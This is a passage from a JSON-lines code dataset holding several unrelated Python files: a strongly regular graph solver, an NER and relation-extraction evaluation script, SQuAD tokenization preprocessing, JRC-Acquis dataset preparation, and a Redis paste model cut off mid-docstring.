is: %s\" % str(vertex_group))\n        if vertex_group[0] == sibling_vertex and vertex_group[1][0] == \\\n           vertex_for_test[0] or vertex_group[1] == sibling_vertex and \\\n           vertex_group[0][0] == vertex_for_test[0]:\n            return False\n    return True\n\ndef search_next_group_vertex():\n    if len(pending_vertex) <= 1:\n        return None\n    vertex_for_group = pending_vertex[0]\n    for vertex in pending_vertex[1:]:\n        if vertex > last_matched_vertex[vertex_for_group] and vertex[0] != vertex_for_group[0] and test_sibling_group(vertex_for_group, vertex): # the two vertices are in different major groups\n            return (vertex_for_group, vertex)\n    if last_matched_vertex[vertex_for_group] != (-1,-1,-1):\n        return (vertex_for_group, last_matched_vertex[vertex_for_group])\n    else:\n        return None\n\ndef test_solution():\n    adjacent_matrix = gen_adjacent_matrix()\n    if lambda_compatible(adjacent_matrix) and \\\n       mu_compatible(adjacent_matrix) and \\\n       meets_adjacency_requirements(adjacent_matrix, debug=True) and \\\n       graph_is_valid(adjacent_matrix):\n        return True\n    else:\n        return False\n\ndef gen_adjacent_matrix():\n    adjacent_matrix = numpy.empty((9,9),dtype='int')\n    for i in range(9):\n        for j in range(9):\n            adjacent_matrix[i,j] = 0\n    vertex_to_matrix_index = {}\n\n    # Initialize each vertex's index in the matrix; solution vertices are numbered starting at 3\n    i = 3\n    for vertex_group in current_solution_stack:\n        vertex_to_matrix_index[vertex_group[0]] = i\n        vertex_to_matrix_index[vertex_group[1]] = i\n        i += 1\n    #print(vertex_to_matrix_index)\n\n    for vertex_group in current_solution_stack:\n        #print(vertex_group)\n        v1 = vertex_group[0]\n        v2 = vertex_group[1]\n        index = vertex_to_matrix_index[v1]\n\n        adjacent_matrix[index, v1[0]] = 1\n        adjacent_matrix[v1[0], index] = 1\n        adjacent_matrix[index, v2[0]] = 1\n        adjacent_matrix[v2[0], index] = 1\n\n        
adjacent_matrix[index, vertex_to_matrix_index[vertex_to_sibling[v1]]] = 1\n adjacent_matrix[vertex_to_matrix_index[vertex_to_sibling[v1]], index] = 1\n adjacent_matrix[index, vertex_to_matrix_index[vertex_to_sibling[v2]]] = 1\n adjacent_matrix[vertex_to_matrix_index[vertex_to_sibling[v2]], index] = 1\n return adjacent_matrix\n\n\n#初始化工作\nsrg = (9,4,1,2)\nv = srg[0]\nk = srg[1]\nlbd = srg[2]\nmu = srg[3]\n\n#初始块数\nblock_count = v // ( 2 + lbd )\n\nlast_matched_vertex = {}\nvertex_to_sibling = {}\n\npending_vertex = list(initial_vertex_clusters(block_count))\nprint(pending_vertex)\nindex = v // block_count\nfor vertex in pending_vertex:\n vertex_to_sibling[vertex] = (vertex[0], vertex[1], 0 if vertex[2] == 1\n else 1)\n last_matched_vertex[vertex] = (-1,-1,-1)\n#print(vertex_to_sibling)\n\ncurrent_solution_stack= [((0,0,0),(1,0,0))] #第一对点可任意\npending_vertex.remove((0,0,0))\npending_vertex.remove((1,0,0))\nwhile len(current_solution_stack) > 0:\n next_vertex_group = search_next_group_vertex()\n if next_vertex_group != None:\n #print(\"next_vertex_group is %s\" % str(next_vertex_group))\n #print(last_matched_vertex[next_vertex_group[0]])\n #测试是否重复匹配,若重复,则需要继续退栈\n if last_matched_vertex[next_vertex_group[0]] == next_vertex_group[1]:\n #清除当前匹配点信息,以便继续匹配\n last_matched_vertex[next_vertex_group[0]] = (-1, -1, -1)\n #print(last_matched_vertex[next_vertex_group[0]])\n last_vertex_group = current_solution_stack.pop()\n pending_vertex.append(last_vertex_group[0])\n pending_vertex.append(last_vertex_group[1])\n pending_vertex.sort()\n #print(\"current pending vertex is %s\" % str(pending_vertex))\n continue\n else:\n last_matched_vertex[next_vertex_group[0]] = next_vertex_group[1]\n current_solution_stack.append(next_vertex_group)\n pending_vertex.remove(next_vertex_group[0])\n pending_vertex.remove(next_vertex_group[1])\n #print(pending_vertex)\n if len(current_solution_stack) == 6:\n if test_solution():\n print(\"Congratulation, found a soultion!!!\")\n #print(current_solution_stack)\n break\n else:\n last_vertex_group = current_solution_stack.pop()\n pending_vertex.append(last_vertex_group[0])\n pending_vertex.append(last_vertex_group[1])\n pending_vertex.sort()\n else:\n continue\n else:\n #print(\"can't find solution for vertex. 
now soutlion stack is %s\" %\n # str(current_solution_stack))\n last_vertex_group = current_solution_stack.pop()\n #print(\"last vertex group is %s\" % str(last_vertex_group))\n pending_vertex.append(last_vertex_group[0])\n pending_vertex.append(last_vertex_group[1])\n pending_vertex.sort()\n #print(\"pending vertex group is %s\" % str(pending_vertex))\nif len(current_solution_stack) == 0:\n print(\"No soultion is found.\")\nelse:\n adjancent_matrix = gen_adjacent_matrix()\n print(\"adjance_matrix is \\n %s\" % str(adjancent_matrix))\n print(lambda_compatible(adjancent_matrix))\n print(mu_compatible(adjancent_matrix))\n print(meets_adjacency_requirements(adjancent_matrix, debug=True))\n print(graph_is_valid(adjancent_matrix))\n", "repo_name": "YouhuaLi/math_misc", "sub_path": "srg_solver/srg.py", "file_name": "srg.py", "file_ext": "py", "file_size_in_byte": 6209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "71921350564", "text": "from predict import PredictionModel\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification\nfrom seqeval.metrics import (\n f1_score,\n precision_score,\n recall_score,\n accuracy_score,\n performance_measure,\n classification_report,\n)\nfrom sklearn.metrics import confusion_matrix\nimport argparse\nfrom glob import glob\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--labels\", required=True)\nparser.add_argument(\"--model_name_or_path\", required=True)\nparser.add_argument(\"--output_dir\", required=True)\nparser.add_argument(\"--test_relations\", required=True)\nparser.add_argument(\"--data_dir\", required=True)\nparser.add_argument(\"--test_entity\", required=True)\nparser.add_argument(\"--summary_dir\", required=True)\n\nargs = parser.parse_args()\n\nfinal_args = {\n \"max_seq_length\": 512,\n \"disable_tqdm\": True,\n \"output_dir\": args.output_dir,\n \"labels\": args.labels,\n \"model_name_or_path\": args.model_name_or_path,\n \"per_device_eval_batch_size\": 1,\n \"fp16\": True,\n}\npredmodel = PredictionModel(final_args)\ntokenizer = AutoTokenizer.from_pretrained(\"distilroberta-base\")\n\ncolor_dict = {\n \"O\": \"\\u001b[0m\",\n \"B-EXPL_VAR\": \"\\u001b[38;5;\" + \"1\" + \"m\",\n \"I-EXPL_VAR\": \"\\u001b[38;5;\" + \"124\" + \"m\",\n \"B-OUTCOME_VAR\": \"\\u001b[38;5;\" + \"2\" + \"m\",\n \"I-OUTCOME_VAR\": \"\\u001b[38;5;\" + \"28\" + \"m\",\n \"B-HR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"I-HR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"B-OR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"I-OR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"B-RR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"I-RR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"B-BASELINE\": \"\\u001b[38;5;\" + \"21\" + \"m\",\n \"I-BASELINE\": \"\\u001b[38;5;\" + \"4\" + \"m\",\n}\n\nREL_SUMMARY_FILENAME = os.path.join(args.summary_dir, \"relation_stats.csv\")\nENT_SUMMARY_FILENAME = os.path.join(args.summary_dir, \"entity_stats.csv\")\nsplit_model = args.model_name_or_path.split(\"/\")\nmodel_name = \"-\".join(split_model[-1].split(\"-\")[:-1])\nseed = split_model[-1].split(\"-\")[-1]\nmodel_type = split_model[-2][13:]\nif \"_nc\" in model_type:\n model_type = model_type[:-3]\nmodel_context = 
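The backtracking search in the record above targets srg(9, 4, 1, 2). Independently of the repository's conway99 helpers, a candidate adjacency matrix can be verified directly against the strongly regular identity A @ A = k*I + lam*A + mu*(J - I - A); a hedged numpy sketch, using the 3x3 rook's graph as a known srg(9, 4, 1, 2) witness:

import numpy as np

def is_strongly_regular(A, v, k, lam, mu):
    # For a symmetric 0/1 adjacency matrix A with zero diagonal,
    # srg(v, k, lam, mu) holds iff A @ A == k*I + lam*A + mu*(J - I - A).
    I = np.eye(v, dtype=int)
    J = np.ones((v, v), dtype=int)
    return np.array_equal(A @ A, k * I + lam * A + mu * (J - I - A))

# 3x3 rook's graph: vertices 0..8 on a grid, adjacent iff same row or column.
A = np.zeros((9, 9), dtype=int)
for a in range(9):
    for b in range(9):
        if a != b and (a // 3 == b // 3 or a % 3 == b % 3):
            A[a, b] = 1

print(is_strongly_regular(A, 9, 4, 1, 2))   # True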
split_model[-2][-3:] == \"_nc\"\n\n\ndef pretty_iob(data_str):\n pretty_string = \"\\u001b[0m\"\n for line in data_str.split(\"\\n\"):\n cols = line.split(\"\\t\")\n if len(cols) > 1:\n token = tokenizer.convert_tokens_to_string(cols[0])\n entity_label = cols[1]\n pretty_string += color_dict[entity_label]\n pretty_string += token\n return pretty_string\n\n\ndef print_debug_info():\n print(\"eval_loss\", eval_loss)\n print(predmodel.generate_iob(trim_pred_ent_labels, data_str))\n\n\n\ndef append_entity_stats(text):\n if not os.path.isfile(ENT_SUMMARY_FILENAME):\n with open(os.path.join(ENT_SUMMARY_FILENAME), \"x\") as csvfile:\n csvfile.write(\"model,no_context,type,seed,\")\n csvfile.write(\"label_name,prec,recall,f1,support\\n\")\n with open(os.path.join(ENT_SUMMARY_FILENAME), \"a\") as csvfile:\n csvfile.write(text)\n\n\ndef append_relation_stats(text):\n if not os.path.isfile(REL_SUMMARY_FILENAME):\n with open(os.path.join(REL_SUMMARY_FILENAME), \"x\") as csvfile:\n csvfile.write(\"model,no_context,type,seed,sentence_id,\")\n csvfile.write(\"mcc,acc,prec,recall,f1\\n\")\n with open(os.path.join(REL_SUMMARY_FILENAME), \"a\") as csvfile:\n csvfile.write(text)\n\n\ndef get_relation_stats(true, pred):\n tn, fp, fn, tp = confusion_matrix(true, pred, labels=[0, 1]).ravel()\n ret_dict = {}\n ret_dict[\"acc\"] = (tp + tn) / (tp + tn + fp + fn)\n ret_dict[\"prec\"] = tp / (tp + fp) if (tp + fp > 0) else 0\n ret_dict[\"recall\"] = tp / (tp + fn) if (tp + fn > 0) else 0\n ret_dict[\"f1\"] = 2 * tp / (2 * tp + fp + fn) if (2 * tp + fp + fn > 0) else 0\n if (tp + fp) * (tp + fn) * (tn + fp) * (tn + fn) == 0:\n ret_dict[\"mcc\"] = 0\n else:\n ret_dict[\"mcc\"] = (tp * tn - fp * fn) / (\n ((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)) ** 0.5\n )\n return ret_dict\n\n\nall_trim_true_ent_labels = []\nall_trim_pred_ent_labels = []\nall_true_rels = []\nall_pred_rels = []\n\nrel_sentw_mcc = 0\nrel_sentw_acc = 0\nrel_sentw_prec = 0\nrel_sentw_recall = 0\nrel_sentw_f1 = 0\nsentw_count = 0\n\nfor foldername in sorted(glob(os.path.join(args.data_dir, \"\") + \"/*/\")):\n sentence_id = foldername.rstrip('/').split('/')[-1]\n print(\"\\nExample ID:\", foldername)\n if args.test_entity == \"1\":\n data_str = predmodel.set_relation(\n open(foldername + \"./entity.txt\", \"r\").read(), None\n )\n dataset = predmodel.create_dataset(data_str)\n (\n pred_rels,\n true_rels,\n pred_entity_ids,\n true_entity_ids,\n eval_loss,\n ) = predmodel.do_predict(dataset)\n (\n trim_pred_ent_labels,\n trim_true_ent_labels,\n ) = predmodel.trim_and_convert_entity_ids(pred_entity_ids, true_entity_ids)\n all_trim_true_ent_labels += trim_true_ent_labels\n all_trim_pred_ent_labels += trim_pred_ent_labels\n\n results = {\n \"precision\": precision_score(trim_true_ent_labels, trim_pred_ent_labels),\n \"recall\": recall_score(trim_true_ent_labels, trim_pred_ent_labels),\n \"f1\": f1_score(trim_true_ent_labels, trim_pred_ent_labels),\n \"performance_measure\": performance_measure(\n trim_true_ent_labels, trim_pred_ent_labels\n ),\n }\n os.makedirs(os.path.join(args.output_dir, sentence_id), exist_ok=True)\n with open(os.path.join(args.output_dir, sentence_id, \"entity.txt\"), \"w\") as pred_iob_file:\n # we need to readd context if it was in the original string\n if \"CONTEXT_END\" in data_str:\n pred_iob_file.write(data_str.split(\"CONTEXT_END\")[0] + \"CONTEXT_END\" + \"\\n\")\n pred_iob_file.write(predmodel.generate_iob(trim_pred_ent_labels, data_str))\n print(\"Metrics:\", results)\n print(\n \"Pred:\",\n 
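get_relation_stats above derives the Matthews correlation coefficient from raw confusion counts. A quick cross-check of that formula against scikit-learn, on illustrative labels rather than the project's data:

from sklearn.metrics import matthews_corrcoef

y_true = [0, 0, 1, 1, 1, 0]
y_pred = [0, 1, 1, 1, 0, 0]

tp = sum(t == p == 1 for t, p in zip(y_true, y_pred))
tn = sum(t == p == 0 for t, p in zip(y_true, y_pred))
fp = sum(p == 1 and t == 0 for t, p in zip(y_true, y_pred))
fn = sum(p == 0 and t == 1 for t, p in zip(y_true, y_pred))

# Same expression as in get_relation_stats above.
mcc = (tp * tn - fp * fn) / (((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)) ** 0.5)
assert abs(mcc - matthews_corrcoef(y_true, y_pred)) < 1e-12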
pretty_iob(predmodel.generate_iob(trim_pred_ent_labels, data_str)),\n )\n print(\n \"True:\",\n pretty_iob(predmodel.generate_iob(trim_true_ent_labels, data_str)),\n )\n if args.test_relations == \"1\":\n concat_true_rels = []\n concat_pred_rels = []\n for relation_file in sorted(\n glob(os.path.join(foldername, \"\") + \"/relation_*.txt\")\n ):\n data_str = open(relation_file, \"r\").read()\n dataset = predmodel.create_dataset(data_str)\n (\n pred_rels,\n true_rels,\n pred_entity_ids,\n true_entity_ids,\n eval_loss,\n ) = predmodel.do_predict(dataset)\n\n concat_true_rels += list(true_rels)\n concat_pred_rels += list(pred_rels)\n all_true_rels += list(true_rels)\n all_pred_rels += list(pred_rels)\n sentw_count += 1\n rel_stats = get_relation_stats(concat_true_rels, concat_pred_rels)\n rel_sentw_mcc += rel_stats[\"mcc\"]\n rel_sentw_acc += rel_stats[\"acc\"]\n rel_sentw_prec += rel_stats[\"prec\"]\n rel_sentw_recall += rel_stats[\"recall\"]\n rel_sentw_f1 += rel_stats[\"f1\"]\n\n append_relation_stats(\n f\"{model_name},{str(model_context)},{model_type},{seed},{sentence_id},\"\n )\n append_relation_stats(\n f\"{rel_stats['mcc']},{rel_stats['acc']},{rel_stats['prec']},{rel_stats['recall']},{rel_stats['f1']}\\n\"\n )\n\nif args.test_relations == \"1\":\n rel_stats = get_relation_stats(all_true_rels, all_pred_rels)\n\n rel_sentw_mcc /= sentw_count\n rel_sentw_acc /= sentw_count\n rel_sentw_prec /= sentw_count\n rel_sentw_recall /= sentw_count\n rel_sentw_f1 /= sentw_count\n\n append_relation_stats(\n f\"{model_name},{str(model_context)},{model_type},{seed},AGGREGATE,\"\n )\n append_relation_stats(\n f\"{rel_stats['mcc']},{rel_stats['acc']},{rel_stats['prec']},{rel_stats['recall']},{rel_stats['f1']}\\n\"\n )\n append_relation_stats(\n f\"{model_name},{str(model_context)},{model_type},{seed},SENTW_AVG,\"\n )\n append_relation_stats(\n f\"{rel_sentw_mcc},{rel_sentw_acc},{rel_sentw_prec},{rel_sentw_recall},{rel_sentw_f1}\\n\"\n )\n\nif args.test_entity == \"1\":\n print(\n \"performance_measure\",\n performance_measure(all_trim_true_ent_labels, all_trim_pred_ent_labels),\n )\n print(classification_report(all_trim_true_ent_labels, all_trim_pred_ent_labels))\n entity_stats = classification_report(\n all_trim_true_ent_labels,\n all_trim_pred_ent_labels,\n output_dict=True,\n )\n\n for label, stats in entity_stats.items():\n append_entity_stats(f\"{model_name},{str(model_context)},{model_type},{seed},\")\n append_entity_stats(\n f\"{label},{stats['precision']},{stats['recall']},{stats['f1-score']},{stats['support']}\\n\"\n )\n", "repo_name": "yoonsikp/clerx_lm", "sub_path": "model/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 8928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "predict.PredictionModel", "line_number": 36, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 37, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", 
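The entity metrics in this script come from seqeval, which expects lists of label sequences and scores whole entity spans rather than individual tags. A minimal sketch of that convention:

from seqeval.metrics import classification_report, f1_score

# The ORG span matches below, but the predicted PER span has the wrong
# boundary, so only one of the two true spans counts as correct.
y_true = [["B-PER", "I-PER", "O", "B-ORG"]]
y_pred = [["B-PER", "O", "O", "B-ORG"]]

print(f1_score(y_true, y_pred))              # 0.5
print(classification_report(y_true, y_pred))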
"line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 103, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "seqeval.metrics.precision_score", "line_number": 153, "usage_type": "call"}, {"api_name": "seqeval.metrics.recall_score", "line_number": 154, "usage_type": "call"}, {"api_name": "seqeval.metrics.f1_score", "line_number": 155, "usage_type": "call"}, {"api_name": "seqeval.metrics.performance_measure", "line_number": 156, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "seqeval.metrics.performance_measure", "line_number": 235, "usage_type": "call"}, {"api_name": "seqeval.metrics.classification_report", "line_number": 237, "usage_type": "call"}, {"api_name": "seqeval.metrics.classification_report", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "22897566340", "text": "from datasets import load_dataset, load_from_disk\nfrom transformers import AutoTokenizer\n\n# raw_datasets = load_dataset(\"squad\")\n# raw_datasets.save_to_disk(\"datasets/squad\")\nraw_datasets = load_from_disk(\"datasets/squad\")\n\nmodel_checkpoint = \"bert-base-cased\"\ntokenizer = AutoTokenizer.from_pretrained(model_checkpoint)\n\ninputs = tokenizer(\n raw_datasets[\"train\"][2:6][\"question\"],\n raw_datasets[\"train\"][2:6][\"context\"],\n max_length=100,\n truncation=\"only_second\",\n stride=50,\n return_overflowing_tokens=True,\n return_offsets_mapping=True,\n)\n\nanswers = raw_datasets[\"train\"][2:6][\"answers\"]\nstart_positions = []\nend_positions = []\n\nfor i, offset in enumerate(inputs[\"offset_mapping\"]):\n sample_idx = inputs[\"overflow_to_sample_mapping\"][i]\n answer = answers[sample_idx]\n start_char = answer[\"answer_start\"][0]\n end_char = answer[\"answer_start\"][0] + len(answer[\"text\"][0])\n sequence_ids = inputs.sequence_ids(i)\n\n # Find the start and end of the context\n idx = 0\n while sequence_ids[idx] != 1:\n idx += 1\n context_start = idx\n while sequence_ids[idx] == 1:\n idx += 1\n context_end = idx - 1\n\n # If the answer is not fully inside the context, label is (0, 0)\n if 
offset[context_start][0] > start_char or offset[context_end][1] < end_char:\n start_positions.append(0)\n end_positions.append(0)\n else:\n # Otherwise it's the start and end token positions\n idx = context_start\n while idx <= context_end and offset[idx][0] <= start_char:\n idx += 1\n start_positions.append(idx - 1)\n\n idx = context_end\n while idx >= context_start and offset[idx][1] >= end_char:\n idx -= 1\n end_positions.append(idx + 1)\n\nidx = 0\nsample_idx = inputs[\"overflow_to_sample_mapping\"][idx]\nanswer = answers[sample_idx][\"text\"][0]\n\nstart = start_positions[idx]\nend = end_positions[idx]\nlabeled_answer = tokenizer.decode(inputs[\"input_ids\"][idx][start : end + 1])\n\nprint(f\"Theoretical answer: {answer}, labels give: {labeled_answer}\")", "repo_name": "Parkerlee0619/NLP-course", "sub_path": "tasks/question_answering/question_answering_00.py", "file_name": "question_answering_00.py", "file_ext": "py", "file_size_in_byte": 2061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datasets.load_from_disk", "line_number": 6, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 9, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "6102581107", "text": "import os\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport pandas as pd\nfrom tqdm import tqdm\nfrom EuroVocAnalyzeTool import Graph, EuroVocAnalyzeTool\nimport pickle\nimport argparse\n\nLANGUAGES = \"en\"\nSAVE_PATH = \"datasets/jrc_en_basic.csv\"\n\n\n## Micro-Thesaurus\ndef get_MThesaurus(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n mthes = analyzeTool.getThesaurusByDescId(desc_id)\n if mthes:\n for mthes_id in mthes:\n if not mthes_id in ret:\n ret.append(mthes_id)\n return ';'.join(ret)\n\n\n## Domains\ndef get_domains(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n domains = analyzeTool.getDomainsByDescId(desc_id)\n if domains:\n for domain_id in domains:\n if not domain_id in ret:\n ret.append(domain_id)\n return ';'.join(ret)\n\n\n## Topterms\ndef get_topterms(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n topterms = analyzeTool.getTopTermsByDescid(desc_id)\n if topterms:\n for topterm_id in topterms:\n if not topterm_id in ret:\n ret.append(topterm_id)\n else:\n ret.append(desc_id)\n return ';'.join(ret)\n\n\n## extended Descriptors\ndef get_extDesc(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n topterms = analyzeTool.getParents(desc_id)\n if topterms:\n for topterm_id in topterms:\n if not topterm_id in ret:\n ret.append(topterm_id)\n else:\n ret.append(desc_id)\n return ';'.join(ret)\n\n\ndef parseXML(path, filename, sep='\\n', section_sep=' #S# '):\n with open(path + '/' + filename) as fin:\n xmlFile = fin.read()\n parsedXml = BeautifulSoup(xmlFile, features=\"html.parser\")\n\n body = signature = annex = ''\n\n try:\n tagclasscode = ';'.join([p.text for p in parsedXml.find('textclass').find_all('classcode')])\n except:\n tagclasscode = ''\n\n divs = parsedXml.find('text').find_all('div')\n for div in divs:\n text = sep.join([p.text for p in div.find_all('p')])\n if div.get('type') == 'body':\n body = text\n elif div.get('type') == 'signature':\n signature = text\n elif div.get('type') == 'annex':\n annex = text\n return body + section_sep + signature + section_sep + 
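The labeling loop above walks a fast tokenizer's offset mapping to turn a character-level answer span into token positions. The same alignment distilled into a standalone helper; the offsets list here is illustrative, not taken from the dataset:

def char_span_to_token_span(offsets, start_char, end_char):
    # offsets[i] is the (start_char, end_char) pair of token i, as produced
    # by a fast tokenizer called with return_offsets_mapping=True.
    token_start = next(i for i, (s, e) in enumerate(offsets) if s <= start_char < e)
    token_end = next(i for i, (s, e) in reversed(list(enumerate(offsets)))
                     if s < end_char <= e)
    return token_start, token_end

offsets = [(0, 5), (6, 8), (9, 13)]              # "Paris", "is", "nice"
print(char_span_to_token_span(offsets, 0, 5))    # (0, 0) -- the span "Paris"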
annex, tagclasscode\n\n\ndef prepareDataset(languages, datasetSplit, save_path):\n def getSplit(celex_id, trainset, valset, testset):\n if celex_id in trainset:\n return 'train'\n elif celex_id in valset:\n return 'val'\n elif celex_id in testset:\n return 'test'\n else:\n return 'no split'\n\n dir_path = save_path[:save_path.rfind('/') + 1]\n Path(dir_path).mkdir(parents=True, exist_ok=True)\n COLNAMES = ['celex_id', 'lang', 'year', 'text', 'Descriptors']\n data = pd.DataFrame(columns=COLNAMES)\n\n for lang in languages.split(\",\"):\n for dirname in tqdm(os.listdir(\"./tmp/\" + lang)):\n path = \"./tmp/\" + lang + \"/\" + dirname\n if os.path.isdir(path):\n for filename in os.listdir(path):\n celex_id = filename[3:-7]\n try:\n text, tagclasscode = parseXML(path, filename, sep=' #NP# ')\n data.loc[len(data)] = [celex_id, lang, dirname, text, tagclasscode]\n except Exception as ex:\n print(ex)\n print(path + '/' + filename)\n\n with open('data/EuroVocAnalysisTool.pickle', 'rb') as handle:\n analyzeTool = pickle.load(handle)\n\n # Extend Dataset\n data['Domains'] = data['Descriptors'].apply(lambda w: get_domains(w, analyzeTool))\n data['MThesaurus'] = data['Descriptors'].apply(lambda w: get_MThesaurus(w, analyzeTool))\n data['Topterm'] = data['Descriptors'].apply(lambda w: get_topterms(w, analyzeTool))\n data['ExtDesc'] = data['Descriptors'].apply(lambda w: get_extDesc(w, analyzeTool))\n\n # Add Iterative Split\n with open(datasetSplit + '/train.txt') as fin:\n trainset = [line.strip() for line in fin]\n with open(datasetSplit + '/validation.txt') as fin:\n valset = [line.strip() for line in fin]\n with open(datasetSplit + '/test.txt') as fin:\n testset = [line.strip() for line in fin]\n data['split'] = data['celex_id'].apply(lambda w: getSplit(w, trainset, valset, testset))\n\n data.to_csv(save_path, index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Download and prepare JRC-Aquis dataset\")\n parser.add_argument(\"--languages\",\n default=\"en\",\n help=\"supported languages separated by commas: \\n\"\n + \"List of supported Languages: en, de, it, fr\", type=str)\n parser.add_argument(\"--dataset_split\", help=\"path to dataset split files\", type=str)\n parser.add_argument(\"--save_path\", help=\"path of the dataset\", type=str)\n\n args = parser.parse_args()\n\n languages = args.languages\n datasetSplit = args.dataset_split\n save_path = args.save_path\n\n prepareDataset(languages, datasetSplit, save_path)\n", "repo_name": "zeinsh/Legal-Docs-Large-MLTC", "sub_path": "prepare_jrc_data.py", "file_name": "prepare_jrc_data.py", "file_ext": "py", "file_size_in_byte": 5326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 69, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 107, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 110, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 120, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "30278219044", "text": "import 
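parseXML above gathers per-div paragraph text with BeautifulSoup's html.parser. A self-contained sketch of that pattern on an inline document, not the JRC files themselves:

from bs4 import BeautifulSoup

doc = """
<TEXT>
  <DIV type="body"><P>First paragraph.</P><P>Second.</P></DIV>
  <DIV type="annex"><P>Annex text.</P></DIV>
</TEXT>
"""

# html.parser lower-cases tag names, which is why the lookups above use
# find('text') and find_all('div') even for upper-case SGML-style sources.
parsed = BeautifulSoup(doc, features="html.parser")
sections = {
    div.get("type"): "\n".join(p.text for p in div.find_all("p"))
    for div in parsed.find("text").find_all("div")
}
print(sections["body"])   # First paragraph. / Second.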
uuid\n\n\nclass ConfigurationError(Exception):\n pass\n\n\nclass NotFound(Exception):\n pass\n\n\nclass RedisModel:\n NotFound = NotFound\n\n @classmethod\n def set_connection(cls, redis_connection):\n if getattr(cls, '_redis_connection', None):\n raise ConfigurationError('Connection already set')\n cls._redis_connection = redis_connection\n\n\nclass Paste(RedisModel):\n def __init__(self, content, key=None):\n self.content = content\n self.key = key\n\n @classmethod\n def find(cls, key):\n content = cls._redis_connection.get(key)\n if content is None:\n raise cls.NotFound(key)\n return cls(content=content, key=key)\n\n def save(self, timeout=60 * 60):\n \"\"\"Save paste in database\n\n If the paste has a key assigned, it is updated only if it is already\n stored in the database. Otherwise, a unique key is generated.\n \"\"\"\n r = self._redis_connection\n\n if self.key:\n if not r.set(self.key, self.content, xx=True):\n raise self.NotFound(\"not stored\")\n # the existing key was updated in place; do not mint a new one\n return self\n\n while True:\n key = str(uuid.uuid4())\n if r.set(key, self.content, nx=True, ex=timeout):\n self.key = key\n break\n return self\n\n def delete(self):\n \"\"\"Delete paste from database.\n\n If the paste does not exist in the database, :exc:`NotFound` is\n raised.\n 